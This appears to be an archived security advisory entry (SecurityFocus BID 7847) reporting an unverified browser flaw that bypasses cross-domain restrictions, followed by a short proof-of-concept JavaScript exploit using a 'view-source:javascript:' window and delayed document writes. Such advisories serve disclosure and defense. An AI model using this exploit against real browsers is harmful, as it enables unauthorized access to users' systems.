Exploit Code
source: http://www.securityfocus.com/bid/7847/info It has been reported that under some circumstances, it is possible violate the cross-domain restriction of browser security. Because of this, an attacker may be able to execute a file across domains and in the local security zone, giving an attacker unintended access to a system. Symantec has not been able to verify the claims. <script> function werd() { a.document.open(); a.document.write("<h1>werd</h1>"); a.document.close(); } function winopen() { a=window.open("view-source:javascript:location='http://www.example.com';"); setTimeout('werd()',23000); } </script>